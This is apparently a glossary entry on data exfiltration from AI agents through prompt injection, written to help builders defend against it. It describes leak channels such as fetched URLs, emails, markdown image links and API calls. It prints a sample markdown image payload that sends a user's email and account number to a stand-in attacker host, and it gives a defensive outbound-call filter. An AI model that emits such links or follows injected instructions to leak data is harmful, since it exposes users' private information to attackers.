Attacks / Standard term
Data exfiltration
An attack that tricks an AI system into sending sensitive data to a destination the attacker controls.
AI systems can leak data through channels that traditional security tools never anticipated. A model tricked by prompt injection might embed a user's private information in a URL it fetches, letting the attacker read the data from their server logs. It could attach confidential details to an outbound email, encode secrets in a markdown image link that pings an external server, or include private records in an API call to a third-party service. AI agents routinely process sensitive data and use tools that reach the outside world, so every outbound action becomes a potential leak path.
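The markdown image channel is worth seeing concretely. Below is a minimal Python sketch of the kind of output a successful injection coaxes the model into emitting; the domain, filename, and data are made up for illustration. When the chat client renders the image, the browser requests the attacker's URL and the secret arrives in their access logs, even though nothing suspicious appears in the visible reply.

```python
from urllib.parse import quote

# What a successful injection makes the model emit: a markdown image whose
# URL query string smuggles the user's data out. "attacker.example" and the
# data below are illustrative, not from a real incident.
stolen = "jane.doe@example.com, account #4417"
exfil_markdown = f"![logo](https://attacker.example/pixel.png?d={quote(stolen)})"
print(exfil_markdown)
# ![logo](https://attacker.example/pixel.png?d=jane.doe%40example.com%2C%20account%20%234417)
```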
Builder example
If your AI agent can read customer data and also send emails, make API calls, or fetch URLs, a single successful prompt injection could turn it into a data pipeline straight to the attacker. The model does not need to 'decide' to leak data. It just needs to follow one cleverly hidden instruction.
Common confusion: Many teams focus on preventing sensitive data from appearing in the model's visible text output. The larger risk is data leaving through tool calls, URL parameters, and API requests: channels end users never see in the chat window.
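One mitigation direction is to inspect every outbound tool call, not just the visible reply. Here is a rough sketch, assuming a simple agent loop where each tool invocation passes through a single guard function; the patterns, tool names, and arguments are illustrative and not a complete data-loss-prevention policy.

```python
import re
from urllib.parse import unquote

# Patterns for data that should never leave the system. Illustrative only;
# real deployments would use their own classifiers or DLP rules.
SENSITIVE = [
    re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),      # US SSN-like
    re.compile(r"\b\d{13,19}\b"),              # card-number-like digit runs
    re.compile(r"[\w.+-]+@[\w-]+\.[\w.]+"),    # email addresses
]

def check_outbound(tool_name: str, arguments: dict) -> None:
    """Inspect every argument of an outbound tool call (URL, email body,
    API payload) before it crosses the trust boundary."""
    for key, value in arguments.items():
        # Decode %-escapes so URL-encoded data cannot slip past the patterns.
        text = unquote(str(value))
        for pattern in SENSITIVE:
            if pattern.search(text):
                raise PermissionError(
                    f"Blocked {tool_name}: argument '{key}' matches a sensitive-data pattern"
                )

# Hypothetical usage: the agent tries to fetch a URL whose query string
# carries a customer's email address planted by an injected instruction.
try:
    check_outbound("fetch_url", {"url": "https://attacker.example/p?d=jane.doe%40example.com"})
except PermissionError as err:
    print(err)  # Blocked fetch_url: argument 'url' matches a sensitive-data pattern
```

The design point is where the check sits: on the tool-call side of the agent, where URLs, email bodies, and API payloads actually leave the system, rather than on the chat text the end user sees.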